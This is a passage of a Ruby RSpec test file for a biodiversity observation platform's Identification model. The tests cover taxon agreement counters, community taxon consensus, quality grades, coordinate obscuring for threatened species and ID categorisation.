obs = Observation.make!
taxon = Taxon.make!
identification = Identification.make!(
:user => obs.user,
:observation => obs,
:taxon => taxon
)
obs.reload
expect(obs.species_guess).to eq taxon.name
end
it "should add an iconic_taxon_id to its observation if it's the observer's identification" do
obs = Observation.make!
identification = Identification.make!(
:user => obs.user,
:observation => obs
)
obs.reload
expect(obs.iconic_taxon_id).to eq identification.taxon.iconic_taxon_id
end
it "should increment the observations num_identification_agreements if this is an agreement" do
taxon = Taxon.make!
obs = Observation.make!(:taxon => taxon)
old_count = obs.num_identification_agreements
Identification.make!(:observation => obs, :taxon => taxon)
obs.reload
expect(obs.num_identification_agreements).to eq old_count+1
end
it "should increment the observation's num_identification_agreements if this is an agreement and there are outdated idents" do
taxon = Taxon.make!
obs = Observation.make!(:taxon => taxon)
old_ident = Identification.make!(:observation => obs, :taxon => taxon)
obs.reload
expect(obs.num_identification_agreements).to eq(1)
obs.reload
Identification.make!(:observation => obs, :user => old_ident.user)
obs.reload
expect(obs.num_identification_agreements).to eq(0)
end
it "should increment the observations num_identification_disagreements if this is a disagreement" do
obs = Observation.make!(:taxon => Taxon.make!)
old_count = obs.num_identification_disagreements
Identification.make!(:observation => obs)
obs.reload
expect(obs.num_identification_disagreements).to eq old_count+1
end
it "should NOT increment the observations num_identification_disagreements if the obs has no taxon" do
obs = Observation.make!
old_count = obs.num_identification_disagreements
Identification.make!(:observation => obs)
obs.reload
expect(obs.num_identification_disagreements).to eq old_count
end
it "should NOT increment the observations num_identification_agreements or num_identification_disagreements if theres just one ID" do
taxon = Taxon.make!
obs = Observation.make!
old_agreement_count = obs.num_identification_agreements
old_disagreement_count = obs.num_identification_disagreements
expect(obs.community_taxon).to be_blank
Identification.make!(:observation => obs, :taxon => taxon)
obs.reload
expect(obs.num_identification_agreements).to eq old_agreement_count
expect(obs.num_identification_disagreements).to eq old_disagreement_count
expect(obs.community_taxon).to be_blank
expect(obs.identifications.count).to eq 1
end
it "should consider an identification with a taxon that is a child of " +
"the observation's taxon to be in agreement" do
taxon = Taxon.make!(rank: Taxon::SPECIES)
parent = Taxon.make!(rank: Taxon::GENUS)
taxon.update_attributes(:parent => parent)
observation = Observation.make!(:taxon => parent, :prefers_community_taxon => false)
identification = Identification.make!(:observation => observation, :taxon => taxon)
expect(identification.user).not_to be(identification.observation.user)
expect(identification.is_agreement?).to be true
end
it "should not consider an identification with a taxon that is a parent " +
"of the observation's taxon to be in agreement" do
taxon = Taxon.make!
parent = Taxon.make!
taxon.update_attributes(:parent => parent)
observation = Observation.make!(:taxon => taxon, :prefers_community_taxon => false)
identification = Identification.make!(:observation => observation, :taxon => parent)
expect(identification.user).not_to be(identification.observation.user)
expect(identification.is_agreement?).to be false
end
it "should not consider identifications of different taxa in the different lineages to be in agreement" do
taxon = Taxon.make!( rank: Taxon::GENUS )
child = Taxon.make!( parent: taxon, rank: Taxon::SPECIES)
o = Observation.make!(:prefers_community_taxon => false)
ident = Identification.make!(:taxon => child, :observation => o)
disagreement = Identification.make!(:observation => o, :taxon => taxon)
expect(disagreement.is_agreement?).to be false
end
it "should update observation quality_grade" do
o = make_research_grade_candidate_observation(taxon: Taxon.make!(rank: Taxon::SPECIES))
expect( o.quality_grade ).to eq Observation::NEEDS_ID
i = Identification.make!(:observation => o, :taxon => o.taxon)
o.reload
expect( o.quality_grade ).to eq Observation::RESEARCH_GRADE
end
it "should trigger setting a taxon photo if obs became research grade" do
t = Taxon.make!( rank: Taxon::SPECIES )
o = make_research_grade_candidate_observation
expect( o ).not_to be_research_grade
expect( t.photos.size ).to eq 0
without_delay do
Identification.make!( observation: o, taxon: t )
Identification.make!( observation: o, taxon: t )
end
o.reload
t.reload
expect( o ).to be_research_grade
expect( t.photos.size ).to eq 1
end
it "should not trigger setting a taxon photo if obs was already research grade" do
o = without_delay { make_research_grade_observation }
o.taxon.taxon_photos.delete_all
expect( o.taxon.photos.count ).to eq 0
i = without_delay { Identification.make!( observation: o, taxon: o.taxon ) }
o.reload
expect( o.taxon.photos.count ).to eq 0
end
it "should not trigger setting a taxon photo if taxon already has a photo" do
t = Taxon.make!( rank: Taxon::SPECIES )
t.photos << LocalPhoto.make!
o = make_research_grade_candidate_observation
expect( o ).not_to be_research_grade
expect( t.photos.size ).to eq 1
without_delay do
Identification.make!( observation: o, taxon: t )
Identification.make!( observation: o, taxon: t )
end
o.reload
t.reload
expect( o ).to be_research_grade
expect( t.photos.size ).to eq 1
end
it "should update observation quality grade after disagreement when observer opts out of CID" do
o = make_research_grade_observation(:prefers_community_taxon => false)
expect(o).to be_research_grade
i = Identification.make!(observation: o, taxon: Taxon.make!(:species))
Identification.make!(observation: o, taxon: i.taxon)
o.reload
expect(o).not_to be_research_grade
o.owners_identification.destroy
o.reload
expect(o.owners_identification).to be_blank
Identification.make!(user: o.user, observation: o, taxon: i.taxon)
o.reload
expect(o).to be_research_grade
end
it "should obscure the observation's coordinates if the taxon is threatened" do
o = Observation.make!(:latitude => 1, :longitude => 1)
expect(o).not_to be_coordinates_obscured
i = Identification.make!(:taxon => make_threatened_taxon, :observation => o, :user => o.user)
o.reload
expect(o).to be_coordinates_obscured
end
it "should set the observation's community taxon" do
t = Taxon.make!
o = Observation.make!(:taxon => t)
expect(o.community_taxon).to be_blank
i = Identification.make!(:observation => o, :taxon => t)
o.reload
expect(o.community_taxon).to eq(t)
end
it "should touch the observation" do
o = Observation.make!
updated_at_was = o.updated_at
op = Identification.make!(:observation => o, :user => o.user)
o.reload
expect(updated_at_was).to be < o.updated_at
end
it "creates observation reviews if they dont exist" do
o = Observation.make!
expect(o.observation_reviews.count).to eq 0
Identification.make!(observation: o, user: o.user)
o.reload
expect(o.observation_reviews.count).to eq 1
end
it "updates existing reviews" do
o = Observation.make!
r = ObservationReview.make!(observation: o, user: o.user, updated_at: 1.day.ago)
Identification.make!(observation: o, user: o.user)
o.reload
expect( o.observation_reviews.first ).to eq r
expect( o.observation_reviews.first.updated_at ).to be > r.updated_at
end
it "marks existing unreviewed reviews as reviewed" do
o = Observation.make!
r = ObservationReview.make!( observation: o, user: o.user )
r.update_attributes( reviewed: false )
Identification.make!( observation: o, user: o.user )
o.reload
expect( o.observation_reviews.first ).to eq r
expect( o.observation_reviews.first ).to be_reviewed
end
it "should set curator_identification_id on project observations to last current identification" do
o = Observation.make!
p = Project.make!
pu = ProjectUser.make!(:user => o.user, :project => p)
po = ProjectObservation.make!(:observation => o, :project => p)
i1 = Identification.make!(:user => p.user, :observation => o)
Delayed::Worker.new.work_off
po.reload
expect(po.curator_identification_id).to eq i1.id
end
it "should set the observation's taxon_geoprivacy if taxon was threatened" do
t = make_threatened_taxon
o = Observation.make!
expect( o.taxon_geoprivacy ).to be_blank
i = Identification.make!( taxon: t, observation: o )
o.reload
expect( o.taxon_geoprivacy ).to eq Observation::OBSCURED
end
describe "with indexing" do
elastic_models( Observation, Identification )
it "should make older identifications not current in elasticsearch" do
old_ident = Identification.make!
without_delay do
Identification.make!( observation: old_ident.observation, user: old_ident.user )
end
es_response = Identification.elastic_search( where: { id: old_ident.id } ).results.results.first
expect( es_response.id.to_s ).to eq old_ident.id.to_s
old_ident.reload
expect( old_ident ).not_to be_current
expect( es_response.current ).to be false
end
describe "user counter cache" do
it "should incremement for an ident on someone else's observation, with delay" do
taxon = Taxon.make!
obs = Observation.make!(taxon: taxon)
user = User.make!
Delayed::Job.destroy_all
expect( Delayed::Job.count ).to eq 0
expect( user.identifications_count ).to eq 0
Identification.make!(user: user, observation: obs, taxon: taxon)
expect( Delayed::Job.count ).to be > 1
user.reload
expect( user.identifications_count ).to eq 0
Delayed::Worker.new.work_off
user.reload
expect( user.identifications_count ).to eq 1
end
it "should NOT incremement for an ident on one's OWN observation" do
user = User.make!
obs = Observation.make!(user: user)
expect {
without_delay{ Identification.make!(user: user, observation: obs) }
}.to_not change(user, :identifications_count)
end
end
end
end
end
describe Identification, "updating" do
it "should not change current status of other identifications" do
i1 = Identification.make!
i2 = Identification.make!(:observation => i1.observation, :user => i1.user)
i1.reload
i2.reload
expect(i1).not_to be_current
expect(i2).to be_current
i1.update_attributes(:body => "foo")
i1.reload
i2.reload
expect(i1).not_to be_current
expect(i2).to be_current
end
describe "observation taxon_geoprivacy" do
it "should change if becomes current" do
threatened = make_threatened_taxon( rank: Taxon::SPECIES )
not_threatened = Taxon.make!( rank: Taxon::SPECIES )
o = Observation.make!( taxon: threatened )
i1 = o.identifications.first
o.reload
expect( o.taxon_geoprivacy ).to eq Observation::OBSCURED
i2 = Identification.make!( user: i1.user, observation: o, taxon: not_threatened )
o.reload
expect( o.taxon_geoprivacy ).to be_blank
i1.reload
i1.update_attributes( current: true )
o.reload
expect( o.taxon_geoprivacy ).to eq Observation::OBSCURED
end
end
end
describe Identification, "deletion" do
it "should remove the taxon associated with the observation if it's the observer's identification and obs does not prefers_community_taxon" do
observation = Observation.make!( taxon: Taxon.make!, prefers_community_taxon: false )
identification = Identification.make!( observation: observation, taxon: observation.taxon )
expect( observation.taxon ).not_to be_blank
expect( observation ).to be_valid
expect( observation.identifications.length ).to be >= 1
doomed_ident = observation.identifications.select do |ident|
ident.user_id == observation.user_id
end.first
expect( doomed_ident.user_id ).to eq observation.user_id
doomed_ident.destroy
observation.reload
expect( observation.taxon_id ).to be_blank
end
it "should NOT remove the taxon associated with the observation if it's the observer's identification and obs prefers_community_taxon " do
observation_prefers_community_taxon = Observation.make!( taxon: Taxon.make! )
identification_prefers_community_taxon = Identification.make!(
observation: observation_prefers_community_taxon,
taxon: observation_prefers_community_taxon.taxon
)
expect( observation_prefers_community_taxon.taxon ).not_to be_nil
expect( observation_prefers_community_taxon ).to be_valid
observation_prefers_community_taxon.reload
expect( observation_prefers_community_taxon.identifications.length ).to be >= 1
doomed_ident = observation_prefers_community_taxon.identifications.select do |ident|
ident.user_id == observation_prefers_community_taxon.user_id
end.first
expect( doomed_ident.user_id ).to eq observation_prefers_community_taxon.user_id
doomed_ident.destroy
observation_prefers_community_taxon.reload
expect( observation_prefers_community_taxon.taxon_id ).not_to be_nil
end
it "should decrement the observation's num_identification_agreements if this was an agreement" do
o = Observation.make!( taxon: Taxon.make! )
i = Identification.make!( observation: o, taxon: o.taxon )
expect( o.num_identification_agreements ).to eq 1
i.destroy
o.reload
expect( o.num_identification_agreements ).to eq 0
end
it "should decrement the observations num_identification_disagreements if this was a disagreement" do
o = Observation.make!( taxon: Taxon.make! )
ident = Identification.make!( observation: o )
o.reload
expect( o.num_identification_disagreements ).to be >= 1
num_identification_disagreements = o.num_identification_disagreements
ident.destroy
o.reload
expect( o.num_identification_disagreements ).to eq num_identification_disagreements - 1
end
it "should decremement the counter cache in users for an ident on someone else's observation" do
i = Identification.make!
expect( i.user ).not_to be i.observation.user
old_count = i.user.identifications_count
user = i.user
i.destroy
user.reload
expect( user.identifications_count ).to eq 0
end
it "should NOT decremement the counter cache in users for an ident on one's OWN observation" do
new_observation = Observation.make!( taxon: Taxon.make! )
new_observation.reload
owners_ident = new_observation.identifications.select do |ident|
ident.user_id == new_observation.user_id
end.first
user = new_observation.user
old_count = user.identifications_count
owners_ident.destroy
user.reload
expect(user.identifications_count).to eq old_count
end
it "should update observation quality_grade" do
o = make_research_grade_observation
expect(o.quality_grade).to eq Observation::RESEARCH_GRADE
o.identifications.last.destroy
o.reload
expect(o.quality_grade).to eq Observation::NEEDS_ID
end
it "should update observation quality_grade if made by another user" do
o = make_research_grade_observation
expect(o.quality_grade).to eq Observation::RESEARCH_GRADE
o.identifications.each {|ident| ident.destroy if ident.user_id != o.user_id}
o.reload
expect(o.quality_grade).to eq Observation::NEEDS_ID
end
it "should not queue a job to update project lists if owners ident" do
o = make_research_grade_observation
Delayed::Job.delete_all
stamp = Time.now
o.owners_identification.destroy
Delayed::Job.delete_all
Identification.make!(:user => o.user, :observation => o, :taxon => Taxon.make!)
jobs = Delayed::Job.where("created_at >= ?", stamp)
pattern = /ProjectList.*refresh_with_observation/m
job = jobs.detect{|j| j.handler =~ pattern}
expect(job).to be_blank
# puts job.handler.inspect
end
it "should queue a job to update check lists if changed from research grade" do
o = make_research_grade_observation
Delayed::Job.delete_all
stamp = Time.now
o.identifications.by(o.user).first.destroy
jobs = Delayed::Job.where("created_at >= ?", stamp)
pattern = /CheckList.*refresh_with_observation/m
job = jobs.detect{|j| j.handler =~ pattern}
expect(job).not_to be_blank
# puts job.handler.inspect
end
it "should queue a job to update check lists if research grade" do
o = make_research_grade_observation
o.identifications.each {|ident| ident.destroy if ident.user_id != o.user_id}
o.reload
expect(o.quality_grade).to eq Observation::NEEDS_ID
stamp = Time.now
Delayed::Job.delete_all
Identification.make!(:taxon => o.taxon, :observation => o)
o.reload
expect(o.quality_grade).to eq Observation::RESEARCH_GRADE
jobs = Delayed::Job.where("created_at >= ?", stamp)
pattern = /CheckList.*refresh_with_observation/m
job = jobs.detect{|j| j.handler =~ pattern}
expect(job).not_to be_blank
# puts job.handler.inspect
end
it "should nilify curator_identification_id on project observations if no other current identification" do
o = Observation.make!
p = Project.make!
pu = ProjectUser.make!(:user => o.user, :project => p)
po = ProjectObservation.make!(:observation => o, :project => p)
i = Identification.make!(:user => p.user, :observation => o)
Identification.run_update_curator_identification(i)
po.reload
expect(po.curator_identification).not_to be_blank
expect(po.curator_identification_id).to eq i.id
i.destroy
po.reload
expect(po.curator_identification_id).to be_blank
end
it "should set curator_identification_id on project observations to last current identification" do
o = Observation.make!
p = Project.make!
pu = ProjectUser.make!(:user => o.user, :project => p)
po = ProjectObservation.make!(:observation => o, :project => p)
i1 = Identification.make!(:user => p.user, :observation => o)
Identification.run_update_curator_identification(i1)
i2 = Identification.make!(:user => p.user, :observation => o)
Identification.run_update_curator_identification(i2)
po.reload
expect(po.curator_identification_id).to eq i2.id
i2.destroy
Identification.run_revisit_curator_identification(o.id, i2.user_id)
po.reload
expect(po.curator_identification_id).to eq i1.id
end
it "should set the user's last identification as current" do
ident1 = Identification.make!
ident2 = Identification.make!(:observation => ident1.observation, :user => ident1.user)
ident3 = Identification.make!(:observation => ident1.observation, :user => ident1.user)
ident2.reload
expect(ident2).not_to be_current
ident3.destroy
ident2.reload
expect(ident2).to be_current
ident1.reload
expect(ident1).not_to be_current
end
it "should set observation taxon to that of last current ident for owner" do
o = Observation.make!(:taxon => Taxon.make!)
ident1 = o.owners_identification
ident2 = Identification.make!(:observation => o, :user => o.user)
ident3 = Identification.make!(:observation => o, :user => o.user)
o.reload
expect(o.taxon_id).to eq(ident3.taxon_id)
ident3.destroy
o.reload
expect(o.taxon_id).to eq(ident2.taxon_id)
end
it "should set the observation's community taxon if remaining identifications" do
load_test_taxa
o = Observation.make!(:taxon => @Calypte_anna)
expect(o.community_taxon).to be_blank
i1 = Identification.make!(:observation => o, :taxon => @Calypte_anna)
i3 = Identification.make!(:observation => o, :taxon => @Calypte_anna)
i2 = Identification.make!(:observation => o, :taxon => @Pseudacris_regilla)
o.reload
expect(o.community_taxon).to eq(@Calypte_anna)
i1.destroy
o.reload
expect(o.community_taxon).to eq(@Chordata) # consensus
end
it "should remove the observation's community taxon if no more identifications" do
o = Observation.make!( taxon: Taxon.make! )
i = Identification.make!( observation: o, taxon: o.taxon )
o.reload
expect( o.community_taxon ).to eq o.taxon
i.destroy
o.reload
expect( o.community_taxon ).to be_blank
end
it "should remove the observation.taxon if there are no more identifications" do
o = Observation.make!
i = Identification.make!( observation: o )
expect( o.taxon ).to eq i.taxon
i.destroy
o.reload
expect( o.taxon ).to be_blank
end
it "destroys automatically created reviews" do
o = Observation.make!
i = Identification.make!(observation: o, user: o.user)
expect(o.observation_reviews.count).to eq 1
i.destroy
o.reload
expect(o.observation_reviews.count).to eq 0
end
it "does not destroy user created reviews" do
o = Observation.make!
i = Identification.make!(observation: o, user: o.user)
o.observation_reviews.destroy_all
r = ObservationReview.make!(observation: o, user: o.user, user_added: true)
expect(o.observation_reviews.count).to eq 1
i.destroy
o.reload
expect(o.observation_reviews.count).to eq 1
end
end
describe Identification, "captive" do
elastic_models( Observation, Identification )
it "should vote yes on the wild quality metric if 1" do
i = Identification.make!(:captive_flag => "1")
o = i.observation
expect(o.quality_metrics).not_to be_blank
expect(o.quality_metrics.first.user).to eq(i.user)
expect(o.quality_metrics.first).not_to be_agree
end
it "should vote no on the wild quality metric if 0 and metric exists" do
i = Identification.make!(:captive_flag => "1")
o = i.observation
expect(o.quality_metrics).not_to be_blank
i.update_attributes(:captive_flag => "0")
o.reload
expect(o.quality_metrics.first).not_to be_agree
end
it "should not alter quality metrics if nil" do
i = Identification.make!(:captive_flag => nil)
o = i.observation
expect(o.quality_metrics).to be_blank
end
it "should not alter quality metrics if 0 and not metrics exist" do
i = Identification.make!(:captive_flag => "0")
o = i.observation
expect(o.quality_metrics).to be_blank
end
end
describe Identification do
elastic_models( Observation, Identification )
it { is_expected.to belong_to :user }
it { is_expected.to belong_to :taxon_change }
it { is_expected.to belong_to(:previous_observation_taxon).class_name "Taxon" }
it { is_expected.to have_many(:project_observations).with_foreign_key(:curator_identification_id).dependent :nullify }
it { is_expected.to validate_presence_of :observation }
it { is_expected.to validate_presence_of :user }
it { is_expected.to validate_presence_of(:taxon).with_message "for an ID must be something we recognize" }
it { is_expected.to validate_length_of(:body).is_at_least(0).is_at_most(Comment::MAX_LENGTH).allow_blank.on :create }
describe "mentions" do
before { enable_has_subscribers }
after { disable_has_subscribers }
it "knows what users have been mentioned" do
u = User.make!
i = Identification.make!(body: "hey @#{ u.login }")
expect( i.mentioned_users ).to eq [ u ]
end
it "generates mention updates" do
u = User.make!
expect( UpdateAction.unviewed_by_user_from_query(u.id, notification: "mention") ).to eq false
i = Identification.make!(body: "hey @#{ u.login }")
expect( UpdateAction.unviewed_by_user_from_query(u.id, notification: "mention") ).to eq true
end
end
describe "run_update_curator_identification" do
it "indexes the observation in elasticsearch" do
o = Observation.make!
p = Project.make!
pu = ProjectUser.make!(user: o.user, project: p)
po = ProjectObservation.make!(observation: o, project: p)
i = Identification.make!(user: p.user, observation: o)
expect( Observation.page_of_results(project_id: p.id, pcid: true).
total_entries ).to eq 0
Identification.run_update_curator_identification(i)
expect( Observation.page_of_results(project_id: p.id, pcid: true).
total_entries ).to eq 1
end
end
end
describe Identification, "category" do
let( :o ) { Observation.make! }
let(:parent) { Taxon.make!( rank: Taxon::GENUS ) }
let(:child) { Taxon.make!( rank: Taxon::SPECIES, parent: parent ) }
describe "should be improving when" do
it "is the first that matches the community ID among several IDs" do
i1 = Identification.make!( observation: o )
i2 = Identification.make!( observation: o, taxon: i1.taxon )
o.reload
i1.reload
expect( o.community_taxon ).to eq i1.taxon
expect( i1.observation.identifications.count ).to eq 2
expect( i1.category ).to eq Identification::IMPROVING
end
it "qualifies but isn't current" do
i1 = Identification.make!( observation: o, taxon: parent )
i2 = Identification.make!( observation: o, taxon: child )
i1.reload
expect( i1.category ).to eq Identification::IMPROVING
i3 = Identification.make!( observation: o, taxon: child, user: i1.user )
i1.reload
expect( i1.category ).to eq Identification::IMPROVING
end
it "is an ancestor of the community taxon and was not added after the first ID of the community taxon" do
i1 = Identification.make!( observation: o, taxon: parent )
i2 = Identification.make!( observation: o, taxon: child )
i3 = Identification.make!( observation: o, taxon: child )
i4 = Identification.make!( observation: o, taxon: child )
o.reload
expect( o.community_taxon ).to eq child
i1.reload
expect( i1.category ).to eq Identification::IMPROVING
end
end
describe "should be maverick when" do
it "the community taxon is not an ancestor" do
i1 = Identification.make!( observation: o )
i2 = Identification.make!( observation: o, taxon: i1.taxon )
i3 = Identification.make!( observation: o )
i3.reload
expect( i3.category ).to eq Identification::MAVERICK
end
end
describe "should be leading when" do
it "is the only ID" do
i = Identification.make!
expect( i.category ).to eq Identification::LEADING
end
it "has a taxon that is a descendant of the community taxon" do
i1 = Identification.make!( observation: o, taxon: parent )
i2 = Identification.make!( observation: o, taxon: parent )
i3 = Identification.make!( observation: o, taxon: child )
expect( i3.category ).to eq Identification::LEADING
end
end
describe "should be supporting when" do
it "matches the community taxon but is not the first to do so" do
i1 = Identification.make!( observation: o )
i2 = Identification.make!( observation: o, taxon: i1.taxon )
expect( i2.category ).to eq Identification::SUPPORTING
end
it "descends from the community taxon but is not the first identification of that taxon" do
i1 = Identification.make!( observation: o, taxon: parent )
i2 = Identification.make!( observation: o, taxon: child )
i3 = Identification.make!( observation: o, taxon: child )
expect( i3.category ).to eq Identification::SUPPORTING
end
end
describe "examples: " do
describe "sequence of IDs along the same ancestry" do
before do
load_test_taxa
@sequence = [
Identification.make!( observation: o, taxon: @Chordata ),
Identification.make!( observation: o, taxon: @Aves ),
Identification.make!( observation: o, taxon: @Calypte ),
Identification.make!( observation: o, taxon: @Calypte_anna )
]
@sequence.each(&:reload)
@sequence
end
it "should all be improving until the community taxon" do
o.reload
expect( o.community_taxon ).to eq @Calypte
expect( @sequence[0].category ).to eq Identification::IMPROVING
expect( @sequence[1].category ).to eq Identification::IMPROVING
end
it "should be improving when it's the first to match the community ID" do
expect( @sequence[2].category ).to eq Identification::IMPROVING
end
it "should end with a leading ID" do
expect( @sequence.last.category ).to eq Identification::LEADING
end
it "should continue to have improving IDs even if the first identifier agrees with the last" do
first = @sequence[0]
i = Identification.make!( observation: o, taxon: @sequence[-1].taxon, user: first.user )
first.reload
@sequence[1].reload
expect( first ).not_to be_current
expect( first.category ).to eq Identification::IMPROVING
expect( @sequence[1].category ).to eq Identification::IMPROVING
end
end
end
describe "after withdrawing and restoring" do
before do
load_test_taxa
u1 = o.user
u2 = User.make!
@sequence = [
Identification.make!( observation: o, taxon: @Calypte_anna, user: u1 ),
Identification.make!( observation: o, taxon: @Calypte, user: u1 ),
Identification.make!( observation: o, taxon: @Calypte, user: u2 ),
Identification.make!( observation: o, taxon: @Calypte_anna, user: u1 ),
]
@sequence.each(&:reload)
o.reload
@sequence
end
it "should not change" do
expect( o.community_taxon ).to eq @Calypte
expect( @sequence[2].category ).to eq Identification::SUPPORTING
@sequence[2].update_attributes( current: false )
expect( @sequence[2] ).not_to be_current
@sequence[2].update_attributes( current: true )
@sequence[2].reload
expect( @sequence[2].category ).to eq Identification::SUPPORTING
end
end
describe "conservative disagreement" do
before do
load_test_taxa
@sequence = [
Identification.make!( observation: o, taxon: @Calypte_anna ),
Identification.make!( observation: o, taxon: @Calypte ),
Identification.make!( observation: o, taxon: @Calypte )
]
@sequence.each(&:reload)
end
it "should consider disagreements that match the community taxon to be improving" do
expect( o.community_taxon ).to eq @Calypte
expect( @sequence[1].category ).to eq Identification::IMPROVING
expect( @sequence[2].category ).to eq Identification::SUPPORTING
end
# it "should consider the identification people disagreed with to be maverick" do
# expect( @sequence[0].category ).to eq Identification::MAVERICK
# end
end
describe "single user redundant identifications" do
before do
load_test_taxa
user = User.make!
@sequence = [
Identification.make!( observation: o, user: user, taxon: @Calypte ),
Identification.make!( observation: o, user: user, taxon: @Calypte )
]
@sequence.each(&:reload)
end
it "should leave the current ID as leading" do
expect( @sequence.last ).to be_current
expect( @sequence.last.category ).to eq Identification::LEADING
end
end
describe "disagreement within a genus" do
before do
load_test_taxa
@sequence = []
@sequence << Identification.make!( observation: o, taxon: @Calypte_anna )
@sequence << Identification.make!( observation: o, taxon: Taxon.make!( parent: @Calypte, rank: Taxon::SPECIES ) )
@sequence << Identification.make!( observation: o, taxon: Taxon.make!( parent: @Calypte, rank: Taxon::SPECIES ) )
@sequence.each(&:reload)
o.reload
expect( o.community_taxon ).to eq @Calypte
end
it "should have all leading IDs" do
expect( @sequence[0].category ).to eq Identification::LEADING
expect( @sequence[1].category ).to eq Identification::LEADING
expect( @sequence[2].category ).to eq Identification::LEADING
end
end
describe "disagreement with revision" do
before do
load_test_taxa
user = User.make!
@sequence = []
@sequence << Identification.make!( observation: o, taxon: @Calypte, user: user )
@sequence << Identification.make!( observation: o, taxon: @Calypte_anna, user: user )
@sequence << Identification.make!( observation: o, taxon: @Calypte )
@sequence.each(&:reload)
o.reload
expect( o.community_taxon ).to eq @Calypte
end
it "should be improving, leading, supporting" do
expect( @sequence[0].category ).to eq Identification::IMPROVING
expect( @sequence[1].category ).to eq Identification::LEADING
expect( @sequence[2].category ).to eq Identification::SUPPORTING
end
end
describe "after taxon swap" do
let(:swap) { make_taxon_swap }
let(:o) { make_research_grade_observation( taxon: swap.input_taxon ) }
it "should be improving, supporting for acitve IDs" do
expect( o.identifications.sort_by(&:id)[0].category ).to eq Identification::IMPROVING
expect( o.identifications.sort_by(&:id)[1].category ).to eq Identification::SUPPORTING
swap.committer = swap.user
swap.commit
Delayed::Worker.new.work_off
o.reload
expect( o.identifications.sort_by(&:id)[2].category ).to eq Identification::IMPROVING
expect( o.identifications.sort_by(&:id)[3].category ).to eq Identification::SUPPORTING
end
end
describe "indexing" do
it "should happen for other idents after new one added" do
i1 = Identification.make!
expect( i1.category ).to eq Identification::LEADING
i2 = Identification.make!( observation: i1.observation, taxon: i1.taxon )
i1.reload
expect( i1.category ).to eq Identification::IMPROVING
es_i1 = Identification.elastic_search( where: { id: i1.id } ).results.results[0]
expect( es_i1.category ).to eq Identification::IMPROVING
end
it "should update this identification's category" do
i1 = Identification.make!
expect( i1.category ).to eq Identification::LEADING
i2 = Identification.make!( observation: i1.observation, taxon: i1.taxon )
i1.reload
i2.reload
expect( i1.category ).to eq Identification::IMPROVING
expect( i2.category ).to eq Identification::SUPPORTING
Delayed::Worker.new.work_off
es_i2 = Identification.elastic_search( where: { id: i2.id } ).results.results[0]
expect( es_i2.category ).to eq Identification::SUPPORTING
end
end
end
describe Identification, "disagreement" do
elastic_models( Observation )
before { load_test_taxa } # Not sure why but these don't seem to pass if I do before(:all)
it "should be nil by default" do
expect( Identification.make! ).not_to be_disagreement
end
it "should automatically set to true on create if the taxon is not a descendant or ancestor of the community taxon" do
o = make_research_grade_observation( taxon: @Calypte_anna)
2.times { Identification.make!( observation: o, taxon: o.taxon ) }
i = Identification.make!( observation: o, taxon: @Pseudacris_regilla )
i.reload
expect( i ).to be_disagreement
end
it "should not be automatically set to true on update if the taxon is not a descendant or ancestor of the community taxon" do
o = make_research_grade_candidate_observation
i = Identification.make!( observation: o, taxon: @Calypte_anna )
4.times { Identification.make!( observation: o, taxon: @Pseudacris_regilla ) }
i.reload
expect( i ).not_to be_disagreement
end
it "should not be automatically set to true if no other identifications are current" do
o = Identification.make!( current: false ).observation
Identification.make!( observation: o, taxon: @Calypte_anna )
o.identifications.each { |i| i.update( current: false ) }
i = Identification.make!( observation: o, taxon: @Pseudacris_regilla )
expect( i ).not_to be_disagreement
end
describe "implicit disagreement" do
it "should set disagreement to true" do
o = Observation.make!( taxon: @Calypte_anna )
Identification.make!( observation: o, taxon: @Calypte_anna )
i = Identification.make!( observation: o, taxon: @Pseudacris_regilla )
expect( i.disagreement ).to eq true
end
it "should not set disagreement previous obs taxon was ungrafted" do
s1 = Taxon.make!( rank: Taxon::SPECIES )
o = Observation.make!( taxon: s1 )
Identification.make!( observation: o, taxon: s1 )
i = Identification.make( observation: o, taxon: @Calypte_anna )
i.save!
expect( i.disagreement ).to be_nil
end
it "should not set disagreement if ident taxon is ungrafted" do
s1 = Taxon.make!( rank: Taxon::SPECIES )
o = Observation.make!( taxon: @Calypte_anna )
Identification.make!( observation: o, taxon: @Calypte_anna )
i = Identification.make!( observation: o, taxon: s1 )
expect( i.disagreement ).to be_nil
end
end
end
describe Identification, "set_previous_observation_taxon" do
elastic_models( Observation )
it "should choose the observation taxon by default" do
o = Observation.make!( taxon: Taxon.make!(:species) )
t = Taxon.make!(:species)
3.times { Identification.make!( observation: o, taxon: t ) }
o.reload
previous_observation_taxon = o.taxon
i = Identification.make!( observation: o )
expect( i.previous_observation_taxon ).to eq previous_observation_taxon
end
it "should choose the probable taxon if the observer has opted out of the community taxon" do
o = Observation.make!( taxon: Taxon.make!(:species), prefers_community_taxon: false )
t = Taxon.make!(:species)
3.times { Identification.make!( observation: o, taxon: t ) }
o.reload
previous_observation_probable_taxon = o.probable_taxon
i = Identification.make!( observation: o )
expect( i.previous_observation_taxon ).to eq previous_observation_probable_taxon
end
it "should set it to the observer's previous identicication taxon if they are the only identifier" do
genus = Taxon.make!( rank: Taxon::GENUS )
species = Taxon.make!( rank: Taxon::SPECIES, parent: genus )
o = Observation.make!( taxon: species )
i1 = o.identifications.first
o.reload
expect( i1 ).to be_persisted
i2 = Identification.make!( observation: o, taxon: genus, user: i1.user )
expect( i2.previous_observation_taxon ).to eq i1.taxon
end
it "should not consider set a previous_observation_taxon to the identification taxon" do
family = Taxon.make!( rank: Taxon::FAMILY )
genus = Taxon.make!( rank: Taxon::GENUS, parent: family, name: "Homo" )
species = Taxon.make!(:species, parent: genus, name: "Homo sapiens" )
o = Observation.make!
i1 = Identification.make!( observation: o, taxon: genus )
i2 = Identification.make!( observation: o, taxon: species )
o.reload
expect( o.probable_taxon ).to eq species
o.reload
i3 = Identification.make!( observation: o, taxon: genus, user: i2.user, disagreement: true )
expect( i3.previous_observation_taxon ).to eq species
end
it "should not happen when you restore a withdrawn ident" do
genus = Taxon.make!( rank: Taxon::GENUS, name: "Genus" )
species1 = Taxon.make!( rank: Taxon::SPECIES, parent: genus, name: "Genus speciesone" )
species2 = Taxon.make!( rank: Taxon::SPECIES, parent: genus, name: "Genus speciestwo" )
o = Observation.make!( taxon: species1 )
i = Identification.make!( observation: o, taxon: genus, disagreement: true )
expect( i.previous_observation_taxon ).to eq species1
expect( o.taxon ).to eq genus
i.update_attributes( current: false )
o.reload
expect( o.taxon ).to eq species1
i2 = Identification.make!( observation: o, user: o.user, taxon: species2 )
expect( o.taxon ).to eq species2
i.update_attributes( current: true )
expect( i.previous_observation_taxon ).to eq species1
end
end
describe Identification, "update_disagreement_identifications_for_taxon" do
elastic_models( Observation )
